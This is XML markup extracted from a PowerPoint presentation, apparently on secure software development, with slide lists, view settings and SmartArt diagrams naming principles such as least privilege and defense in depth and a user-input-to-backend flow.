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1455" r:id="rId2"/>
    <p:sldId id="1584" r:id="rId3"/>
    <p:sldId id="1531" r:id="rId4"/>
    <p:sldId id="1498" r:id="rId5"/>
    <p:sldId id="1499" r:id="rId6"/>
    <p:sldId id="1579" r:id="rId7"/>
    <p:sldId id="1503" r:id="rId8"/>
    <p:sldId id="1501" r:id="rId9"/>
    <p:sldId id="1569" r:id="rId10"/>
    <p:sldId id="1575" r:id="rId11"/>
    <p:sldId id="1570" r:id="rId12"/>
    <p:sldId id="1578" r:id="rId13"/>
    <p:sldId id="1576" r:id="rId14"/>
    <p:sldId id="1577" r:id="rId15"/>
    <p:sldId id="1552" r:id="rId16"/>
    <p:sldId id="1580" r:id="rId17"/>
    <p:sldId id="1559" r:id="rId18"/>
    <p:sldId id="1554" r:id="rId19"/>
    <p:sldId id="1585" r:id="rId20"/>
    <p:sldId id="1586" r:id="rId21"/>
    <p:sldId id="1587" r:id="rId22"/>
    <p:sldId id="1588" r:id="rId23"/>
    <p:sldId id="1547" r:id="rId24"/>
    <p:sldId id="1546" r:id="rId25"/>
    <p:sldId id="1548" r:id="rId26"/>
    <p:sldId id="1549" r:id="rId27"/>
    <p:sldId id="1550" r:id="rId28"/>
    <p:sldId id="1551" r:id="rId29"/>
    <p:sldId id="1033" r:id="rId30"/>
    <p:sldId id="1558" r:id="rId31"/>
    <p:sldId id="1564" r:id="rId32"/>
    <p:sldId id="1565" r:id="rId33"/>
    <p:sldId id="1561" r:id="rId34"/>
    <p:sldId id="1562" r:id="rId35"/>
    <p:sldId id="1572" r:id="rId36"/>
    <p:sldId id="1555" r:id="rId37"/>
    <p:sldId id="1581" r:id="rId38"/>
    <p:sldId id="1556" r:id="rId39"/>
    <p:sldId id="1567" r:id="rId40"/>
    <p:sldId id="1413" r:id="rId41"/>
    <p:sldId id="1495" r:id="rId42"/>
    <p:sldId id="1557" r:id="rId43"/>
    <p:sldId id="1392" r:id="rId44"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9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F8DA332-498F-42A6-A2C9-CF447893222E}">
          <p14:sldIdLst>
            <p14:sldId id="1455"/>
            <p14:sldId id="1584"/>
            <p14:sldId id="1531"/>
            <p14:sldId id="1498"/>
            <p14:sldId id="1499"/>
            <p14:sldId id="1579"/>
            <p14:sldId id="1503"/>
            <p14:sldId id="1501"/>
            <p14:sldId id="1569"/>
            <p14:sldId id="1575"/>
            <p14:sldId id="1570"/>
            <p14:sldId id="1578"/>
            <p14:sldId id="1576"/>
            <p14:sldId id="1577"/>
            <p14:sldId id="1552"/>
            <p14:sldId id="1580"/>
            <p14:sldId id="1559"/>
            <p14:sldId id="1554"/>
            <p14:sldId id="1585"/>
            <p14:sldId id="1586"/>
            <p14:sldId id="1587"/>
            <p14:sldId id="1588"/>
            <p14:sldId id="1547"/>
            <p14:sldId id="1546"/>
            <p14:sldId id="1548"/>
            <p14:sldId id="1549"/>
            <p14:sldId id="1550"/>
            <p14:sldId id="1551"/>
            <p14:sldId id="1033"/>
            <p14:sldId id="1558"/>
            <p14:sldId id="1564"/>
            <p14:sldId id="1565"/>
            <p14:sldId id="1561"/>
            <p14:sldId id="1562"/>
            <p14:sldId id="1572"/>
            <p14:sldId id="1555"/>
            <p14:sldId id="1581"/>
            <p14:sldId id="1556"/>
            <p14:sldId id="1567"/>
            <p14:sldId id="1413"/>
            <p14:sldId id="1495"/>
            <p14:sldId id="1557"/>
            <p14:sldId id="13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x Iribarren" initials="" lastIdx="7" clrIdx="0"/>
  <p:cmAuthor id="1" name="Nikos Kasioumis" initials="" lastIdx="3" clrIdx="1"/>
  <p:cmAuthor id="2" name="Sebastian Lopienski" initials="" lastIdx="3" clrIdx="2"/>
  <p:cmAuthor id="3" name="Jerome Caffaro" initials="" lastIdx="1" clrIdx="3"/>
  <p:cmAuthor id="4" name="Harris Tzovanakis" initials="" lastIdx="2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loop="1"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E6EF"/>
    <a:srgbClr val="89AAD3"/>
    <a:srgbClr val="9BBB59"/>
    <a:srgbClr val="0D0D0D"/>
    <a:srgbClr val="24262B"/>
    <a:srgbClr val="262626"/>
    <a:srgbClr val="C95F0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347"/>
    <p:restoredTop sz="91214" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="164" d="100"/>
          <a:sy n="164" d="100"/>
        </p:scale>
        <p:origin x="624" y="168"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1620"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="120" d="100"/>
        <a:sy n="120" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="5216"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="52" d="100"/>
          <a:sy n="52" d="100"/>
        </p:scale>
        <p:origin x="-2722" y="-9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07620F-0C55-7140-A878-C358DE07C2E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74D007DD-02D5-0B47-BE07-0A3667763737}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Least privilege principle</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{414D8CE1-135F-0A49-A9EC-399CA0ABBB70}" type="parTrans" cxnId="{1D0CAA13-8044-B442-BE8F-1D393809F11C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EC6CB1C-D1BF-5F49-ADC7-1783A52933CF}" type="sibTrans" cxnId="{1D0CAA13-8044-B442-BE8F-1D393809F11C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4FB80421-6CF9-8B4D-A45E-826A53C14072}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Complexity kills security</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FDDD8D45-85FE-4F4C-AB58-EF4A497D73DA}" type="parTrans" cxnId="{0E33E9E3-34BE-EA43-8F91-2F28E896B638}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2FEC26D9-210E-4540-A606-B730BBB9C4A6}" type="sibTrans" cxnId="{0E33E9E3-34BE-EA43-8F91-2F28E896B638}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C79DFBF6-FF50-C64F-ADE0-B8150CA0870B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Defense </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>in depth</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDFAE1E6-71AF-9F41-AE87-48C71332E5B8}" type="parTrans" cxnId="{C910E480-BA19-8548-A794-49A916D2ABDF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B03E4910-FC6A-174E-A988-298C1DB38AF2}" type="sibTrans" cxnId="{C910E480-BA19-8548-A794-49A916D2ABDF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{21F4D51D-A60E-5943-A7AB-5D6357B86470}" type="pres">
      <dgm:prSet presAssocID="{E707620F-0C55-7140-A878-C358DE07C2E3}" presName="compositeShape" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="7"/>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3E9E7A09-76FD-8B43-AB29-97A22D1B8D30}" type="pres">
      <dgm:prSet presAssocID="{74D007DD-02D5-0B47-BE07-0A3667763737}" presName="circ1" presStyleLbl="vennNode1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F0FE0D64-C508-C146-9F67-5D81BB87805F}" type="pres">
      <dgm:prSet presAssocID="{74D007DD-02D5-0B47-BE07-0A366776373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FE80FC2-4B98-314E-BA67-F7E1C068A021}" type="pres">
      <dgm:prSet presAssocID="{4FB80421-6CF9-8B4D-A45E-826A53C14072}" presName="circ2" presStyleLbl="vennNode1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4405E301-5AD0-AD4E-B5DF-DA4B62B4F5D9}" type="pres">
      <dgm:prSet presAssocID="{4FB80421-6CF9-8B4D-A45E-826A53C1407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F4085A85-2B95-D546-96BA-C1196B30EDD8}" type="pres">
      <dgm:prSet presAssocID="{C79DFBF6-FF50-C64F-ADE0-B8150CA0870B}" presName="circ3" presStyleLbl="vennNode1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EB972681-A52C-D543-BD29-30DC202DFC28}" type="pres">
      <dgm:prSet presAssocID="{C79DFBF6-FF50-C64F-ADE0-B8150CA0870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1D0CAA13-8044-B442-BE8F-1D393809F11C}" srcId="{E707620F-0C55-7140-A878-C358DE07C2E3}" destId="{74D007DD-02D5-0B47-BE07-0A3667763737}" srcOrd="0" destOrd="0" parTransId="{414D8CE1-135F-0A49-A9EC-399CA0ABBB70}" sibTransId="{1EC6CB1C-D1BF-5F49-ADC7-1783A52933CF}"/>
    <dgm:cxn modelId="{177E2F19-CB69-0E45-A4BB-4AC5FE97F1D4}" type="presOf" srcId="{E707620F-0C55-7140-A878-C358DE07C2E3}" destId="{21F4D51D-A60E-5943-A7AB-5D6357B86470}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{B7F98F69-4FA4-CF41-9D63-5BB41CD9ACCB}" type="presOf" srcId="{4FB80421-6CF9-8B4D-A45E-826A53C14072}" destId="{4405E301-5AD0-AD4E-B5DF-DA4B62B4F5D9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{D6790C6F-A385-0A4F-BDFE-B2B8D420E14F}" type="presOf" srcId="{C79DFBF6-FF50-C64F-ADE0-B8150CA0870B}" destId="{EB972681-A52C-D543-BD29-30DC202DFC28}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{9C256476-6FDD-1A42-AF3E-311FC343632B}" type="presOf" srcId="{C79DFBF6-FF50-C64F-ADE0-B8150CA0870B}" destId="{F4085A85-2B95-D546-96BA-C1196B30EDD8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{4C794077-22AB-DE42-AC1B-2E7CB0F0BD4F}" type="presOf" srcId="{4FB80421-6CF9-8B4D-A45E-826A53C14072}" destId="{9FE80FC2-4B98-314E-BA67-F7E1C068A021}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{C910E480-BA19-8548-A794-49A916D2ABDF}" srcId="{E707620F-0C55-7140-A878-C358DE07C2E3}" destId="{C79DFBF6-FF50-C64F-ADE0-B8150CA0870B}" srcOrd="2" destOrd="0" parTransId="{BDFAE1E6-71AF-9F41-AE87-48C71332E5B8}" sibTransId="{B03E4910-FC6A-174E-A988-298C1DB38AF2}"/>
    <dgm:cxn modelId="{A1BD21A5-11FD-274D-BA86-DB52F10A2887}" type="presOf" srcId="{74D007DD-02D5-0B47-BE07-0A3667763737}" destId="{3E9E7A09-76FD-8B43-AB29-97A22D1B8D30}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{0E33E9E3-34BE-EA43-8F91-2F28E896B638}" srcId="{E707620F-0C55-7140-A878-C358DE07C2E3}" destId="{4FB80421-6CF9-8B4D-A45E-826A53C14072}" srcOrd="1" destOrd="0" parTransId="{FDDD8D45-85FE-4F4C-AB58-EF4A497D73DA}" sibTransId="{2FEC26D9-210E-4540-A606-B730BBB9C4A6}"/>
    <dgm:cxn modelId="{7E56EBE8-C9AE-3542-9D6A-36AB1F2D0ABF}" type="presOf" srcId="{74D007DD-02D5-0B47-BE07-0A3667763737}" destId="{F0FE0D64-C508-C146-9F67-5D81BB87805F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{77A0611D-2D05-F949-BB35-D6030C78AC5D}" type="presParOf" srcId="{21F4D51D-A60E-5943-A7AB-5D6357B86470}" destId="{3E9E7A09-76FD-8B43-AB29-97A22D1B8D30}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{0F79A0B4-C940-C24B-8824-829BAA4E68AC}" type="presParOf" srcId="{21F4D51D-A60E-5943-A7AB-5D6357B86470}" destId="{F0FE0D64-C508-C146-9F67-5D81BB87805F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{0691EA33-9EED-9042-86BA-F21E45638BE8}" type="presParOf" srcId="{21F4D51D-A60E-5943-A7AB-5D6357B86470}" destId="{9FE80FC2-4B98-314E-BA67-F7E1C068A021}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{24AFD2FE-AEEE-DF46-AB58-C2030F9EB56F}" type="presParOf" srcId="{21F4D51D-A60E-5943-A7AB-5D6357B86470}" destId="{4405E301-5AD0-AD4E-B5DF-DA4B62B4F5D9}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{DA77BEBD-B96E-B840-9B63-1659FC983D82}" type="presParOf" srcId="{21F4D51D-A60E-5943-A7AB-5D6357B86470}" destId="{F4085A85-2B95-D546-96BA-C1196B30EDD8}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{5BA1DD46-AF1F-1149-AD2D-419B664F9B8A}" type="presParOf" srcId="{21F4D51D-A60E-5943-A7AB-5D6357B86470}" destId="{EB972681-A52C-D543-BD29-30DC202DFC2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48EA94-1C6C-430C-ADBA-9D3284E93593}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/process2" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful2" csCatId="colorful" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{93663A16-3A09-47B1-9D77-AFD2FCAB737F}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" sz="1500" b="1" dirty="0"/>
            <a:t>User input</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8FC5CF21-049B-494B-AE22-A671EB8D9D73}" type="sibTrans" cxnId="{D21E1A38-02E1-4D20-BEC2-0FE04F07BEDE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9BEFB4D3-4D3F-40AF-AD2F-861CC39DA178}" type="parTrans" cxnId="{D21E1A38-02E1-4D20-BEC2-0FE04F07BEDE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53D3FFF3-07C4-4538-BC84-BCB0F6C4E74A}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" sz="1500" b="1" dirty="0"/>
            <a:t>Server-side code</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A300F94-85E9-4125-85E3-4874BC28A987}" type="sibTrans" cxnId="{7633087C-C28C-466C-AC84-D6652653541C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2B0ED253-66ED-4157-8CF3-12E5F097F4AC}" type="parTrans" cxnId="{7633087C-C28C-466C-AC84-D6652653541C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D4577C5-A543-4C60-B25C-4A1D28BF56FC}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" sz="1500" b="1" dirty="0"/>
            <a:t>Backend systems </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-GB" sz="1500" b="1" dirty="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-GB" sz="1500" dirty="0"/>
            <a:t>(database, command-line etc.)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{28DBBD02-A669-4B4A-8443-ADE2A07D3890}" type="sibTrans" cxnId="{E1487C1E-AD39-4A18-8C94-F5ED1197EE75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B58C226-0083-4AB8-83CC-18DAA180B3B8}" type="parTrans" cxnId="{E1487C1E-AD39-4A18-8C94-F5ED1197EE75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2A37F7D2-ECB8-473B-AF09-4D433F27C816}" type="pres">
      <dgm:prSet presAssocID="{A148EA94-1C6C-430C-ADBA-9D3284E93593}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{178AB25F-DD6E-4F2F-898A-55622403BD7D}" type="pres">
      <dgm:prSet presAssocID="{93663A16-3A09-47B1-9D77-AFD2FCAB737F}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleX="206821">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{512D843D-FFA6-448A-933F-933AD3CB21F5}" type="pres">
      <dgm:prSet presAssocID="{8FC5CF21-049B-494B-AE22-A671EB8D9D73}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2" custLinFactNeighborX="-83804"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4995CCBE-20E9-4F5D-AE66-A0FEEB5DE430}" type="pres">
      <dgm:prSet presAssocID="{8FC5CF21-049B-494B-AE22-A671EB8D9D73}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{60FA2900-388A-4767-8E60-665FB1229F33}" type="pres">
      <dgm:prSet presAssocID="{53D3FFF3-07C4-4538-BC84-BCB0F6C4E74A}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleX="206821">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D0E539FA-5CCD-48B6-88D8-024364E357BE}" type="pres">
      <dgm:prSet presAssocID="{4A300F94-85E9-4125-85E3-4874BC28A987}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2" custLinFactNeighborX="-83804"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5EC2A51D-A922-41B8-9335-4368E8505A1E}" type="pres">
      <dgm:prSet presAssocID="{4A300F94-85E9-4125-85E3-4874BC28A987}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DECCAB2B-7502-405B-A60C-6BD6EE0BFE3B}" type="pres">
      <dgm:prSet presAssocID="{6D4577C5-A543-4C60-B25C-4A1D28BF56FC}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custScaleX="206821">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{E1487C1E-AD39-4A18-8C94-F5ED1197EE75}" srcId="{A148EA94-1C6C-430C-ADBA-9D3284E93593}" destId="{6D4577C5-A543-4C60-B25C-4A1D28BF56FC}" srcOrd="2" destOrd="0" parTransId="{0B58C226-0083-4AB8-83CC-18DAA180B3B8}" sibTransId="{28DBBD02-A669-4B4A-8443-ADE2A07D3890}"/>
    <dgm:cxn modelId="{D21E1A38-02E1-4D20-BEC2-0FE04F07BEDE}" srcId="{A148EA94-1C6C-430C-ADBA-9D3284E93593}" destId="{93663A16-3A09-47B1-9D77-AFD2FCAB737F}" srcOrd="0" destOrd="0" parTransId="{9BEFB4D3-4D3F-40AF-AD2F-861CC39DA178}" sibTransId="{8FC5CF21-049B-494B-AE22-A671EB8D9D73}"/>
    <dgm:cxn modelId="{8E7C223F-91D7-4520-83A8-C3F0A9439762}" type="presOf" srcId="{53D3FFF3-07C4-4538-BC84-BCB0F6C4E74A}" destId="{60FA2900-388A-4767-8E60-665FB1229F33}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{EC5FAF5E-EA0C-48B5-A426-377B270BE48A}" type="presOf" srcId="{8FC5CF21-049B-494B-AE22-A671EB8D9D73}" destId="{4995CCBE-20E9-4F5D-AE66-A0FEEB5DE430}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{93406B5F-34D1-4D39-BC1A-747CF497014E}" type="presOf" srcId="{6D4577C5-A543-4C60-B25C-4A1D28BF56FC}" destId="{DECCAB2B-7502-405B-A60C-6BD6EE0BFE3B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{DBD1C879-D67B-4B72-BC4E-A4280AD05E10}" type="presOf" srcId="{4A300F94-85E9-4125-85E3-4874BC28A987}" destId="{D0E539FA-5CCD-48B6-88D8-024364E357BE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{7633087C-C28C-466C-AC84-D6652653541C}" srcId="{A148EA94-1C6C-430C-ADBA-9D3284E93593}" destId="{53D3FFF3-07C4-4538-BC84-BCB0F6C4E74A}" srcOrd="1" destOrd="0" parTransId="{2B0ED253-66ED-4157-8CF3-12E5F097F4AC}" sibTransId="{4A300F94-85E9-4125-85E3-4874BC28A987}"/>
    <dgm:cxn modelId="{D7920E86-8526-4FFA-A940-CD891074B3E3}" type="presOf" srcId="{8FC5CF21-049B-494B-AE22-A671EB8D9D73}" destId="{512D843D-FFA6-448A-933F-933AD3CB21F5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{91F2BF9A-8F60-4E29-B736-99E559A8A124}" type="presOf" srcId="{4A300F94-85E9-4125-85E3-4874BC28A987}" destId="{5EC2A51D-A922-41B8-9335-4368E8505A1E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{F64F3ECE-7BCF-43BD-AF4F-9519B60E5655}" type="presOf" srcId="{A148EA94-1C6C-430C-ADBA-9D3284E93593}" destId="{2A37F7D2-ECB8-473B-AF09-4D433F27C816}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{DD9726FE-4AD9-4D18-AE00-5ACAA371874F}" type="presOf" srcId="{93663A16-3A09-47B1-9D77-AFD2FCAB737F}" destId="{178AB25F-DD6E-4F2F-898A-55622403BD7D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{6126BF4C-FAB7-4E44-A251-A1960514771E}" type="presParOf" srcId="{2A37F7D2-ECB8-473B-AF09-4D433F27C816}" destId="{178AB25F-DD6E-4F2F-898A-55622403BD7D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{0793591A-3F6A-4143-97B9-A88CB58FAC38}" type="presParOf" srcId="{2A37F7D2-ECB8-473B-AF09-4D433F27C816}" destId="{512D843D-FFA6-448A-933F-933AD3CB21F5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{5C9C5BF3-602F-44CB-A204-8946590E85CD}" type="presParOf" srcId="{512D843D-FFA6-448A-933F-933AD3CB21F5}" destId="{4995CCBE-20E9-4F5D-AE66-A0FEEB5DE430}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{431909AB-D7F8-47F1-B140-C5487B8D032C}" type="presParOf" srcId="{2A37F7D2-ECB8-473B-AF09-4D433F27C816}" destId="{60FA2900-388A-4767-8E60-665FB1229F33}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{B668B3A4-40CC-47F0-85E3-A825075F629A}" type="presParOf" srcId="{2A37F7D2-ECB8-473B-AF09-4D433F27C816}" destId="{D0E539FA-5CCD-48B6-88D8-024364E357BE}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{B1D918B8-8D04-401C-9C1A-8C9CD659BAB1}" type="presParOf" srcId="{D0E539FA-5CCD-48B6-88D8-024364E357BE}" destId="{5EC2A51D-A922-41B8-9335-4368E8505A1E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{749B9BBE-54C0-43F3-B562-523E834C1B6A}" type="presParOf" srcId="{2A37F7D2-ECB8-473B-AF09-4D433F27C816}" destId="{DECCAB2B-7502-405B-A60C-6BD6EE0BFE3B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9E7A09-76FD-8B43-AB29-97A22D1B8D30}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3254497" y="46580"/>
